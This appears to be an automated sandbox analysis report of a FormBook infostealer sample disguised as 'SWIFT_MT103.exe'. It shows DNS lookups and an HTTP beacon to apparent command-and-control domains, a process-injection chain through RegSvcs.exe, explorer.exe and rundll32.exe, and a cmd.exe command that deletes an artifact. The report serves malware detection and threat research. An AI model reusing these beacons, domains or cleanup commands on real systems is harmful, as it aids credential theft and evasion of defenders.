                                          Aug 3, 2021 19:43:16.408776999 CEST53589878.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:17.214229107 CEST5657953192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:17.246607065 CEST53565798.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:18.851102114 CEST6063353192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:18.883559942 CEST53606338.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:19.581871986 CEST6129253192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:19.616677999 CEST53612928.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:21.404828072 CEST6361953192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:21.432297945 CEST53636198.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:23.168562889 CEST6493853192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:23.201366901 CEST53649388.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:24.403549910 CEST6194653192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:24.436944962 CEST53619468.8.8.8192.168.2.3
                                          Aug 3, 2021 19:43:27.655698061 CEST6491053192.168.2.38.8.8.8
                                          Aug 3, 2021 19:43:27.696520090 CEST53649108.8.8.8192.168.2.3
                                          Aug 3, 2021 19:44:01.328989983 CEST5212353192.168.2.38.8.8.8
                                          Aug 3, 2021 19:44:01.370043993 CEST53521238.8.8.8192.168.2.3
                                          Aug 3, 2021 19:44:04.879187107 CEST5613053192.168.2.38.8.8.8
                                          Aug 3, 2021 19:44:04.914628983 CEST53561308.8.8.8192.168.2.3
                                          Aug 3, 2021 19:44:15.753284931 CEST5633853192.168.2.38.8.8.8
                                          Aug 3, 2021 19:44:15.898096085 CEST53563388.8.8.8192.168.2.3
                                          Aug 3, 2021 19:44:26.308141947 CEST5942053192.168.2.38.8.8.8
                                          Aug 3, 2021 19:44:26.348918915 CEST53594208.8.8.8192.168.2.3
                                          Aug 3, 2021 19:44:31.371221066 CEST5878453192.168.2.38.8.8.8
                                          Aug 3, 2021 19:44:31.408288956 CEST53587848.8.8.8192.168.2.3
                                          Aug 3, 2021 19:44:36.466392994 CEST6397853192.168.2.38.8.8.8
                                          Aug 3, 2021 19:44:36.622869968 CEST53639788.8.8.8192.168.2.3

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Aug 3, 2021 19:44:15.753284931 CEST192.168.2.38.8.8.80x484Standard query (0)www.garagekuhn.comA (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:26.308141947 CEST192.168.2.38.8.8.80xb6d9Standard query (0)www.bodymoisturizer.onlineA (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:31.371221066 CEST192.168.2.38.8.8.80x25eeStandard query (0)www.fayansistanbul.comA (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:36.466392994 CEST192.168.2.38.8.8.80x4620Standard query (0)www.josiemaxwrites.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Aug 3, 2021 19:44:15.898096085 CEST8.8.8.8192.168.2.30x484No error (0)www.garagekuhn.comwebacc3.sd6.ghst.netCNAME (Canonical name)IN (0x0001)
                                          Aug 3, 2021 19:44:15.898096085 CEST8.8.8.8192.168.2.30x484No error (0)webacc3.sd6.ghst.net155.133.142.5A (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:26.348918915 CEST8.8.8.8192.168.2.30xb6d9Name error (3)www.bodymoisturizer.onlinenonenoneA (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:31.408288956 CEST8.8.8.8192.168.2.30x25eeNo error (0)www.fayansistanbul.com172.67.130.233A (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:31.408288956 CEST8.8.8.8192.168.2.30x25eeNo error (0)www.fayansistanbul.com104.21.3.157A (IP address)IN (0x0001)
                                          Aug 3, 2021 19:44:36.622869968 CEST8.8.8.8192.168.2.30x4620No error (0)www.josiemaxwrites.com199.34.228.67A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.garagekuhn.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.349744155.133.142.580C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 3, 2021 19:44:15.948903084 CEST6542OUTGET /q4kr/?h6=Vpi8s2sp00E&4h_4=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY HTTP/1.1
                                          Host: www.garagekuhn.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Aug 3, 2021 19:44:15.985829115 CEST6542INHTTP/1.1 301 Moved Permanently
                                          Date: Tue, 03 Aug 2021 17:44:15 GMT
                                          Server: Varnish
                                          Location: https://www.garagekuhn.com/q4kr/?h6=Vpi8s2sp00E&4h_4=CWCBar0ajh7IOPyGoiQ+OSxuK1fv7pOEcpev3lNBz5ExpQMJFIwPX0r3WtdZztc5D/uY
                                          Content-Length: 0
                                          Connection: close


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: SWIFT_MT103.exe PID: 720 Parent PID: 5676

                                          General

                                          Start time:19:42:26
                                          Start date:03/08/2021
                                          Path:C:\Users\user\Desktop\SWIFT_MT103.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SWIFT_MT103.exe'
                                          Imagebase:0x690000
                                          File size:735744 bytes
                                          MD5 hash:B54E7FB4262C31A414B6DBCB49A5D800
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: RegSvcs.exe PID: 6056 Parent PID: 720

                                          General

                                          Start time:19:43:08
                                          Start date:03/08/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:{path}
                                          Imagebase:0xb70000
                                          File size:45152 bytes
                                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: explorer.exe PID: 3388 Parent PID: 6056

                                          General

                                          Start time:19:43:10
                                          Start date:03/08/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff714890000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: rundll32.exe PID: 5040 Parent PID: 3388

                                          General

                                          Start time:19:43:37
                                          Start date:03/08/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                          Imagebase:0x180000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: cmd.exe PID: 4960 Parent PID: 5040

                                          General

                                          Start time:19:43:42
                                          Start date:03/08/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                          Imagebase:0xbd0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 5428 Parent PID: 4960

                                          General

                                          Start time:19:43:42
                                          Start date:03/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6b2800000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >